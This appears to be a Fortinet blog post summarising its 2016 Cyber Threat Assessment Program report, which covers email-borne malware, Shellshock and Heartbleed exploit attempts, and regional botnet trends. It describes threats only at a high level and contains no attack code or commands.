Published just this week, the most recent report includes some interesting trends that every security professional ought to be reviewing in order to keep ahead of the ever-shifting threat landscape.
The Fortinet Cyber Threat Assessment Program (CTAP) recorded over 185 million threat events and incidents. Surprisingly, in spite of an increased focus on security by many organizations, most of these attacks still managed to slip past traditional perimeter security defenses and onto the internal network where Fortinet assessment devices were located. Fortunately, as a result, we have been able to use this data to form a more accurate picture of kinds of threats and techniques that manage to penetrate organizations. Much of that intelligence is reflected in this quarter’s report.
In spite of massive campaigns to get users to not click on email links or attachments from senders they don’t know, email-based attacks continue to be successful. One of the most interesting facts gleaned from this quarter’s Fortinet CTAP Report is that email with infected attachments or links leading to malicious content continue to be the primary delivery method of targeting organizations with malware. The next most common attack vector was malicious websites containing infected online content accessed via normal web browsing activities.
In spite of the high-profile growth of ransomware and newer, more sophisticated attacks, we continue to document a steady increase in the volume and velocity of attempted attacks delivered through email. Which also means that far too many organizations have still failed to install and/or implement adequate email security countermeasures.
Hackers traditionally target unpatched devices and that is not set to change anytime soon. In fact, the top globally exploited attempt was targeted against the Bourne Shell vulnerability through the attack commonly referred to as Shellshock – a vulnerability uncovered in 2014. We also saw a large number of Heartbleed attacks targeted at the well-documented OpenSSL vulnerability.
A growing attack vector we are tracking, in general, is unpatched secondary vulnerabilities embedded in open systems. For some of these, we actually recorded some of the highest numbers of attempted exploits we have seen, running across many industries. The reason seems to be that attackers understand that patching vulnerabilities in libraries or auxiliary software is harder than merely patching primary applications. So far too often, it doesn’t get done.
We also recorded a large number of attacks against commonly used open source applications and services, like OpenBSD and DNS. Additionally, attackers are enhancing these older attacks with new techniques designed to bypass perimeter security defenses and escape detection.
Interestingly, we documented that geographic regions each have their own unique challenges. North America had the most application vulnerability attacks (with more than 40,000 incidents per day). South America had the highest peer-to-peer application usage in the world, and the H-worm botnet was far and away the dominant malware detected there. In EMEA, the top challenge was the Conficker worm. And Asia-Pacific leads all regions in malware/botnets detected, which may be correlated to their simultaneously being ranked first in malicious websites visited per day.
We have also documented that attackers are being more selective about the sorts of attacks they use depending on the market segment of the organization they have targeted.
This quarter’s report also provides some critical guidance on what to do about the threats we have documented. They include:
The quarterly threat landscape report provides a wealth of timely threat analysis and security intelligence. Combined with the weekly Fortinet’s Threat Intelligence Brief, available by subscription, they provide essential information to help keep today’s security professionals apprised of the latest threats targeting their networks.
You can download a copy of the 2016 Fortinet CTAP Report here.